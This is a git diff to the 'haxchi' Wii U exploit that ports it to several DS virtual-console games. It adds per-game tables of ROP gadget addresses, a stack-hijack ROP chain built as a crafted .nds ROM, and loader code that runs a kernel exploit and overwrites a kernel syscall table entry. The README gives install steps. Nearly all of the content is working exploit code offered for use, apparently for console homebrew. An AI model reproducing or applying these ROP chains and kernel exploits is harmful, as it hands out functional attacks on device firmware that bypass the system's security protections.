diff --git a/Makefile b/Makefile index a3d024f..5db9de6 100644 --- a/Makefile +++ b/Makefile @@ -1,18 +1,50 @@ .PHONY := all code550.bin -all: WUP-N-DAAP.nds +all: brainage kirby yoshids brainage.zip kirby.zip yoshids.zip -code550.bin: +brainage: setup_brainage brainage.nds + +kirby: setup_kirby kirby.nds + +yoshids: setup_yoshids yoshids.nds + +setup_brainage: + rm -f *.bin @cd hbl_loader && make && cd .. + @cp -f brainage_defs.s defines.s -haxchi_rop_hook.bin haxchi_rop.bin: code550.bin haxchi_rop.s +setup_kirby: + rm -f *.bin + @cd hbl_loader && make && cd .. + @cp -f kirby_defs.s defines.s + +setup_yoshids: + rm -f *.bin + @cd hbl_loader && make && cd .. + @cp -f yoshids_defs.s defines.s + +brainage.nds: armips haxchi_rop.s - -WUP-N-DAAP.nds: haxchi_rop_hook.bin haxchi_rop.bin haxchi.s armips haxchi.s - zip -JXjq9 rom.zip WUP-N-DAAP.nds + +kirby.nds: + armips haxchi_rop.s + armips haxchi.s + +yoshids.nds: + armips haxchi_rop.s + armips haxchi.s + +brainage.zip: + zip -JXjq9 brainage.zip brainage.nds + +kirby.zip: + zip -JXjq9 kirby.zip kirby.nds + +yoshids.zip: + zip -JXjq9 yoshids.zip yoshids.nds clean: - @rm -f *.bin WUP-N-DAAP.nds rom.zip + @rm -f *.bin brainage.nds brainage.zip kirby.nds kirby.zip yoshids.nds yoshids.zip @cd hbl_loader && make clean && cd .. @echo "all cleaned up !" diff --git a/README.md b/README.md index 76a6809..202f117 100644 --- a/README.md +++ b/README.md @@ -1,18 +1,25 @@ # haxchi -This is a ported version of the haxchi exploit created by smea and others for the european release of brain training. +This is a ported version of the haxchi exploit created by smea and others for all sorts of different ds vc games. In addition to being ported it also includes a homebrew launcher loader as its payload so you can use it for a lot of things. ## install process haxchi can be very easily installed using iosuhax's wupclient. for example, if hachihachi is installed to the MLC, it suffices to do: ``` - w.up("rom.zip", "/vol/storage_mlc01/usr/title/00050000/10179C00/content/0010/rom.zip") + w.up("rom.zip", "/vol/storage_mlc01/usr/title/00050000/YOUR_GAME_TITLE_ID/content/0010/rom.zip") ``` of course, using wupclient to install haxchi permanently requires that redNAND be disabled, unless hachihachi is installed to USB, in which case it can be installed from redNAND using: ``` - w.up("rom.zip", "/vol/storage_usb01/usr/title/00050000/10179C00/content/0010/rom.zip") + w.up("rom.zip", "/vol/storage_usb01/usr/title/00050000/YOUR_GAME_TITLE_ID/content/0010/rom.zip") ``` +make sure to replace YOUR_GAME_TITLE_ID with one of the following: +10179B00 - US Brain Age +10179C00 - PAL Brain Training +10198A00 - US Yoshi's Island DS +10198A00 - PAL Yoshi's Island DS +101A5600 - US Kirby Squeak Squad +101A5700 - PAL Kirby Mouse Attack ## contents diff --git a/brainage_defs.s b/brainage_defs.s new file mode 100644 index 0000000..3361889 --- /dev/null +++ b/brainage_defs.s @@ -0,0 +1,41 @@ + +FILE_NDS_NAME equ "brainage.nds" + +; game stack return address +HAX_TARGET_ADDRESS equ (0x1076FAA4) + +HACHI_APPLICATION_PTR equ (0x10A6E038) + +ARM9_ROM_LOCATION equ (0x16220400) +ARM7_ROM_MEM2_START equ (0xEBDDFC00) + +; constants for position calcs +RPX_OFFSET equ (0x01800000) + +; rop-gadgets part 1 (used for all sorts of different things) +LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02208F6C) +BCTRL equ (RPX_OFFSET + 0x02208EA4) +MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x0209A500) +LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x0209A12C) +LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020A38AC) +MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x0216FBF0) +LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02279BB8) + +; rop-gadgets part 2 (only used to set up core 0 thread stack) +LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0206966C) +MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020A58C4) +LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200B8D0) +LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0207AD84) +LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205182C) +LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02014E0C) +LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x0213FE6C) +MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0202028C) + +; functions used from game +NERD_CREATETHREAD equ (RPX_OFFSET + 0x02223C40) +NERD_STARTTHREAD equ (RPX_OFFSET + 0x0222405C) +NERD_JOINTHREAD equ (RPX_OFFSET + 0x02223AEC) +HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02007774) +NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201BD28) +CORE_SHUTDOWN equ (RPX_OFFSET + 0x02222FBC) +_START_EXIT equ (RPX_OFFSET + 0x02022A70) diff --git a/coreinit.s b/coreinit.s new file mode 100644 index 0000000..865304b --- /dev/null +++ b/coreinit.s @@ -0,0 +1,19 @@ + +; constants for position calcs +COREINIT_OFFSET equ (- 0xFE3C00) + +; coreinit gadgets +MTCTR_R30_MR_R8R21_R7R29_R6R28_R5R27_R4R25_R3R24_BCTRL equ (COREINIT_OFFSET + 0x02002968) + +; coreinit functions +OS_CREATETHREAD equ (0x02025764 + COREINIT_OFFSET) +OS_GETTHREADAFFINITY equ (0x020266A4 + COREINIT_OFFSET) +OS_FORCEFULLRELAUNCH equ (0x02019BA8 + COREINIT_OFFSET) +OSCODEGEN_GETVARANGE equ (0x0201B1C0 + COREINIT_OFFSET) +OSCODEGEN_SWITCHSECMODE equ (0x0201B2C0 + COREINIT_OFFSET) +MEMCPY equ (0x02019BC8 + COREINIT_OFFSET) +DC_FLUSHRANGE equ (0x02007B88 + COREINIT_OFFSET) +IC_INVALIDATERANGE equ (0x02007CB0 + COREINIT_OFFSET) +OSSAVESDONE_READYTORELEASE equ (0x0201D5B8 + COREINIT_OFFSET) +OSRELEASEFOREGROUND equ (0x0201D5BC + COREINIT_OFFSET) +OSFATAL equ (0x02015218 + COREINIT_OFFSET) diff --git a/haxchi.s b/haxchi.s index 904da72..3f9796d 100644 --- a/haxchi.s +++ b/haxchi.s @@ -1,8 +1,7 @@ -.create "WUP-N-DAAP.nds", 0 -.nds +.include "defines.s" +.create FILE_NDS_NAME, 0 -; game stack return address -hax_target_address equ 0x1076FAA4 +.nds .org 0x000 .ascii "HAXCHI" ; Game Title @@ -19,7 +18,7 @@ hax_target_address equ 0x1076FAA4 .word arm9_data_end - arm9_data ; ARM9 size .word arm7_data ; ARM7 rom_offset .word 0x2000000 ; ARM7 entry_address - .word 0xEBDDFC00 + hax_target_address ; ARM7 ram_address + .word ARM7_ROM_MEM2_START + HAX_TARGET_ADDRESS ; ARM7 ram_address .word arm7_data_end - arm7_data ; ARM7 size .org 0x080 diff --git a/haxchi_rop.s b/haxchi_rop.s index 096b455..744757a 100644 --- a/haxchi_rop.s +++ b/haxchi_rop.s @@ -1,64 +1,11 @@ - -; game stack return address -hax_target_address equ 0x1076FAA4 - -; constants for position calcs -COREINIT_OFFSET equ (- 0xFE3C00) -RPX_OFFSET equ (0x01800000) -SYSAPP_OFFSET equ (0x01B75D00) - -; rop-gadgets part 1 (used for all sorts of different things) -LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02208F6C) -MTCTR_R28_ADDI_R6x68_MR_R5R29_R4R22_R3R21_BCTRL equ (RPX_OFFSET + 0x02208E90) -BCTRL equ (RPX_OFFSET + 0x02208EA4) -MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x0209A500) -LWZ_R0x104_MTLR_R0_ADDI_R1x100_BLR equ (RPX_OFFSET + 0x020E0108) -LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x0209A12C) -LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020A38AC) -MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x0216FBF0) -LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02279BB8) -MTCTR_R30_MR_R8R21_R7R29_R6R28_R5R27_R4R25_R3R24_BCTRL equ (COREINIT_OFFSET + 0x02002968) - -; rop-gadgets part 2 (only used to set up core 0 thread stack) -LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0206966C) -MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020A58C4) -LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200B8D0) -LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0207AD84) -LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205182C) -LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02014E0C) -LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x0213FE6C) -MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0202028C) - -; functions used from game and libraries -NERD_CREATETHREAD equ (RPX_OFFSET + 0x02223C40) -NERD_STARTTHREAD equ (RPX_OFFSET + 0x0222405C) -NERD_JOINTHREAD equ (RPX_OFFSET + 0x02223AEC) -HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02007774) -NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x201BD28) -CORE_SHUTDOWN equ (RPX_OFFSET + 0x02222FBC) -_START_EXIT equ (RPX_OFFSET + 0x02022A70) - -_SYSLAUNCHMIISTUDIO equ (SYSAPP_OFFSET + 0x020019D4) - -OS_CREATETHREAD equ (0x02025764 + COREINIT_OFFSET) -OS_GETTHREADAFFINITY equ (0x020266A4 + COREINIT_OFFSET) -OS_FORCEFULLRELAUNCH equ (0x02019BA8 + COREINIT_OFFSET) -OSCODEGEN_GETVARANGE equ (0x0201B1C0 + COREINIT_OFFSET) -OSCODEGEN_SWITCHSECMODE equ (0x0201B2C0 + COREINIT_OFFSET) -MEMCPY equ (0x02019BC8 + COREINIT_OFFSET) -DC_FLUSHRANGE equ (0x02007B88 + COREINIT_OFFSET) -IC_INVALIDATERANGE equ (0x02007CB0 + COREINIT_OFFSET) -OSSAVESDONE_READYTORELEASE equ (0x0201D5B8 + COREINIT_OFFSET) -OSRELEASEFOREGROUND equ (0x0201D5BC + COREINIT_OFFSET) -OSFATAL equ (0x02015218 + COREINIT_OFFSET) +.include "coreinit.s" +.include "defines.s" ; more useful definitions -CODEGEN_ADR equ 0x01800000 +CODEGEN_ADR equ (0x01800000) -HACHI_APPLICATION_PTR equ (0x10A6E038) - -NERD_THREAD0OBJECT equ (hax_target_address - 0x1000) -NERD_THREAD2OBJECT equ (hax_target_address - 0x2000) +NERD_THREAD0OBJECT equ (HAX_TARGET_ADDRESS - 0x1000) +NERD_THREAD2OBJECT equ (HAX_TARGET_ADDRESS - 0x2000) .macro set_sp,v .word LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR @@ -155,17 +102,19 @@ NERD_THREAD2OBJECT equ (hax_target_address - 0x2000) ; hacked from arm7 ram offset (unsafe, game stack pointer) -.create "haxchi_rop_hook.bin", hax_target_address +.create "haxchi_rop_hook.bin", HAX_TARGET_ADDRESS .arm.big rop_hook_start: + ;call_func BCTRL, 0x0, 0x0, 0x0, 0x0 ; infinite loop + ;call_func OSFATAL, 0x1007E7A8, 0, 0, 0 ; move stack pointer to safe area set_sp (rop_start - 4) .Close ; original game arm9 ram offset (safe, normally arm9 code) -.create "haxchi_rop.bin", 0x16220400 +.create "haxchi_rop.bin", ARM9_ROM_LOCATION .arm.big rop_start: @@ -209,7 +158,7 @@ rop_start: ; prepare r31 to be a valid value for the next call .word LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR .word 0xDEADBABE ; r30 - .word (0x1076FAA4-0x3000) ; r31 (has to be valid here) + .word (HAX_TARGET_ADDRESS-0x3000) ; r31 (has to be valid here) .word 0xDEAD0001 ; garbage ; loads the required value for the addition onto r3 later on .word LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR @@ -253,9 +202,6 @@ rop_start: call_func HACHI_APPLICATION_SHUTDOWNANDDESTROY, HACHI_APPLICATION_PTR, 0, 0, 0 call_func CORE_SHUTDOWN, 0, 0, 0, 0 - ; on exit we want to go into mii studio directly - call_func _SYSLAUNCHMIISTUDIO, 0x0, 0x0, 0x0, 0x0 - ; prepare system for foreground release call_func OSSAVESDONE_READYTORELEASE, 0, 0, 0, 0 diff --git a/hbl_loader/Makefile b/hbl_loader/Makefile index 88fc7d9..9e3d839 100644 --- a/hbl_loader/Makefile +++ b/hbl_loader/Makefile @@ -2,10 +2,11 @@ PATH := $(DEVKITPPC)/bin:$(PATH) PREFIX ?= powerpc-eabi- CC = $(PREFIX)gcc AS = $(PREFIX)gcc -CFLAGS = -std=gnu99 -Os -nostdinc -fno-builtin +CFLAGS = -std=gnu99 -O0 -nostdinc -fno-builtin -g ASFLAGS = -mregnames -x assembler-with-cpp LD = $(PREFIX)ld -LDFLAGS=-Ttext 1800000 --oformat binary -L$(DEVKITPPC)/lib/gcc/powerpc-eabi/4.8.2 -lgcc +OBJCOPY = $(PREFIX)objcopy +LDFLAGS=-Ttext 1800000 -L$(DEVKITPPC)/lib/gcc/powerpc-eabi/4.8.2 -lgcc OBJDUMP ?= $(PREFIX)objdump project := . root := $(CURDIR) @@ -35,11 +36,13 @@ main: sd_loader.h $(AS) $(ASFLAGS) -DVER=$(FIRMWARE) -c $(project)/crt0.S cp -r $(root)/*.o $(build) rm $(root)/*.o - $(LD) -s -o ../code$(FIRMWARE).bin $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) + $(LD) -o code$(FIRMWARE).elf $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) -Map code.map + $(OBJCOPY) code$(FIRMWARE).elf -O binary ../code$(FIRMWARE).bin clean: rm -rf $(build) rm -rf sd_loader.h + rm -rf code$(FIRMWARE).elf code.map make clean -C sd_loader print_stats: diff --git a/hbl_loader/launcher.c b/hbl_loader/launcher.c index de6068d..1a79277 100644 --- a/hbl_loader/launcher.c +++ b/hbl_loader/launcher.c @@ -41,15 +41,19 @@ extern void KernelPatches(void); /* ****************************************************************** */ void __main(void) { - /* Quit ongoing menu load music */ unsigned int sound_handle = 0; - OSDynLoad_Acquire("snd_core.rpl", &sound_handle); - void (* AXInit)(); - void (* AXQuit)(); - OSDynLoad_FindExport(sound_handle, 0, "AXInit", &AXInit); - OSDynLoad_FindExport(sound_handle, 0, "AXQuit", &AXQuit); - AXInit(); - AXQuit(); + OSDynLoad_Acquire("sndcore2.rpl", &sound_handle); + if(sound_handle == 0) + { + /* Quit ongoing menu load music */ + OSDynLoad_Acquire("snd_core.rpl", &sound_handle); + void (* AXInit)(); + void (* AXQuit)(); + OSDynLoad_FindExport(sound_handle, 0, "AXInit", &AXInit); + OSDynLoad_FindExport(sound_handle, 0, "AXQuit", &AXQuit); + AXInit(); + AXQuit(); + } /* Get coreinit handle and keep it in memory */ unsigned int coreinit_handle; @@ -82,6 +86,57 @@ void __main(void) if (private_data.OSEffectiveToPhysical((void *)0xa0000000) == (void *)0) run_kexploit(&private_data); + /* Prepare for _SYSLaunchMiiStudio thread */ + int (*OSCreateThread)(void *thread, void *entry, int argc, void *args, unsigned int stack, unsigned int stack_size, int priority, unsigned short attr); + int (*OSResumeThread)(void *thread); + int (*OSIsThreadTerminated)(void *thread); + + OSDynLoad_FindExport(coreinit_handle, 0, "OSCreateThread", &OSCreateThread); + OSDynLoad_FindExport(coreinit_handle, 0, "OSResumeThread", &OSResumeThread); + OSDynLoad_FindExport(coreinit_handle, 0, "OSIsThreadTerminated", &OSIsThreadTerminated); + + /* Allocate a stack for the thread */ + void *stack = private_data.MEMAllocFromDefaultHeapEx(0x1000, 0x20); + /* Create the thread variable */ + void *thread = private_data.MEMAllocFromDefaultHeapEx(0x1000, 8); + if(!thread || !stack) + ExitFailure(&private_data, "Thread memory allocation failed. Exit and re-enter browser."); + + /* Quickly find _SYSLaunchMiiStudio */ + unsigned int sysapp_handle; + void (*_SYSLaunchMiiStudio)(void) = 0; + OSDynLoad_Acquire("sysapp.rpl", &sysapp_handle); + OSDynLoad_FindExport(sysapp_handle, 0, "_SYSLaunchMiiStudio", &_SYSLaunchMiiStudio); + if(_SYSLaunchMiiStudio == (void*)0) + OSFatal("_SYSLaunchMiiStudio is not there?"); + + /* Do _SYSLaunchMiiStudio in core 1 */ + int ret = OSCreateThread(thread, _SYSLaunchMiiStudio, 0, (void*)0, (unsigned int)stack+0x1000, 0x1000, 0, 0x1A); + if (ret == 0) + ExitFailure(&private_data, "Failed to create thread. Exit and re-enter browser."); + + /* Schedule it for execution */ + OSResumeThread(thread); + + /* Can not use OSJoinThread, which hangs for some reason, so we use a detached one and wait for it to terminate */ + while(OSIsThreadTerminated(thread) == 0) + { + asm volatile ( + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + ); + } + + /* Free thread memory and stack */ + private_data.MEMFreeToDefaultHeap(thread); + private_data.MEMFreeToDefaultHeap(stack); + /* setup kernel copy data syscall */ kern_write((void*)(KERN_SYSCALL_TBL_2 + (0x25 * 4)), (unsigned int)KernelCopyData); diff --git a/kirby_defs.s b/kirby_defs.s new file mode 100644 index 0000000..8b90ae4 --- /dev/null +++ b/kirby_defs.s @@ -0,0 +1,41 @@ + +FILE_NDS_NAME equ "kirby.nds" + +; game stack return address +HAX_TARGET_ADDRESS equ (0x107968AC) + +HACHI_APPLICATION_PTR equ (0x10c8c938) + +ARM9_ROM_LOCATION equ (0x1643F200) +ARM7_ROM_MEM2_START equ (0xEBBC0E00) + +; constants for position calcs +RPX_OFFSET equ (0x01800000) + +; rop-gadgets part 1 (used for all sorts of different things) +LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02207084) +BCTRL equ (RPX_OFFSET + 0x02206FBC) +MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3610) +LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A323C) +LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020ACA38) +MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02179168) +LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277B44) + +; rop-gadgets part 2 (only used to set up core 0 thread stack) +LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018908) +MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AEA50) +LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4A8) +LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02082DC0) +LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205788C) +LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018990) +LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x021492A4) +MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240EC) + +; functions used from game +NERD_CREATETHREAD equ (RPX_OFFSET + 0x022219E8) +NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221E04) +NERD_JOINTHREAD equ (RPX_OFFSET + 0x02221894) +HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CC8) +NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB1C) +CORE_SHUTDOWN equ (RPX_OFFSET + 0x02220D4C) +_START_EXIT equ (RPX_OFFSET + 0x0202693C) diff --git a/yoshids_defs.s b/yoshids_defs.s new file mode 100644 index 0000000..a563db0 --- /dev/null +++ b/yoshids_defs.s @@ -0,0 +1,41 @@ + +FILE_NDS_NAME equ "yoshids.nds" + +; game stack return address +HAX_TARGET_ADDRESS equ (0x1079B52C) + +HACHI_APPLICATION_PTR equ (0x10C91938) + +ARM9_ROM_LOCATION equ (0x16444200) +ARM7_ROM_MEM2_START equ (0xEBBBBE00) + +; constants for position calcs +RPX_OFFSET equ (0x01800000) + +; rop-gadgets part 1 (used for all sorts of different things) +LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02206F7C) +BCTRL equ (RPX_OFFSET + 0x02206EB4) +MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3508) +LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A3134) +LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02001068) +MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02179060) +LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277A3C) + +; rop-gadgets part 2 (only used to set up core 0 thread stack) +LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018910) +MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AE948) +LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4B0) +LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02082DBC) +LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x02057874) +LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018998) +LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x0214919C) +MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240F4) + +; functions used from game +NERD_CREATETHREAD equ (RPX_OFFSET + 0x022218E0) +NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221CFC) +NERD_JOINTHREAD equ (RPX_OFFSET + 0x0222178C) +HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CD0) +NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB24) +CORE_SHUTDOWN equ (RPX_OFFSET + 0x02220C44) +_START_EXIT equ (RPX_OFFSET + 0x02026944)